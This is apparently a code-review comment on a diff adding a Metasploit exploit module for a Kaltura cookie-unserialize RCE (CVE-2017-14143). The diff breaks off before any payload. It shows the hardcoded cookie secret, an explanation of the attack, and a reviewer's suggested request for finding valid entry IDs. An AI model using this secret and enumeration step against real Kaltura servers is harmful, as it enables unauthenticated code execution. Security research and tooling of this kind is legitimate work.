modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb

```diff
@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  CookieSecret = 'y3tAno3therS$cr3T'
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Kaltura Remote PHP Code Execution over Cookie',
+      'Description'    => %q{
+        This module exploits an Object Injection vulnerability in Kaltura.
+        By exploiting this vulnerability, unauthenticated users can execute
+        arbitrary code under the context of the web server user.
+
+        Kaltura makes use of a hardcoded cookie secret which allows to sign
+        arbitrary cookie data. After passing this signature check, the base64-
+        decoded data is passed to PHPs unserialize() function which allows for
+        code execution. The constructed object is again based on the SektionEins
+        Zend code execution POP chain PoC. Kaltura versions prior to 13.1.0 are
+        affected by this issue.
+
+        A valid entry_id (which is required for this exploit) can be obtained
+        from any media resource published on the kaltura installation.
+
+        This module was tested against Kaltura 13.1.0-2 installed on Ubuntu 14.04.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+            'Robin Verton <hello@robinverton.de>',
+            'Mehmet Ince <mehmet@mehmetince.net>'    # first kaltura rce module
+        ],
+      'References'      =>
+        [
+          ['CVE', '2017-14143']
+        ],
+      'Privileged'      => false,
+      'Platform'        => ['php'],
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [ ['Automatic', {}] ],
+      'DisclosureDate'  => 'Sep 12 2017',
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The target URI of the Kaltura installation', '/']),
+        OptString.new('ENTRYID', [true, 'Valid entry ID of any media resource (example: 0_lahha4c9)', ''])
+      ]
+    )
+  end
+
+  def check
```

Comment:
As far as I can understand, you need to use valid entry_id. So why don't you directly send HTTP request to the `[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_28bwo20l` and look for `0_28bwo20l` at the returned XML file.

**Valid entryid:**
http://[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_28bwo20l

Response
```
<assets>
<asset id="0_28bwo20l" name="PAISD Mobile App Video" media_type="1" kshow_id="0_duymlto7" url="/content/entry/data/4/278/0_28bwo20l_" ready="1" thumbnail_path="/content/entry/thumbnail/4/278/0_28bwo20l_100001.jpg" credit="rpicon" source_link="file:/opt/kaltura/web/content/uploads/8221424122327.1663_1wfwuh0mo0wck8ccgokg.mov_.mov" duration="283" list_type="show" contributor_screen_name="ANONYMOUS"/>
</assets>
```

**Unvalid entryid:**
http://[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_ffffffff

response
```
<assets>

</assets>
```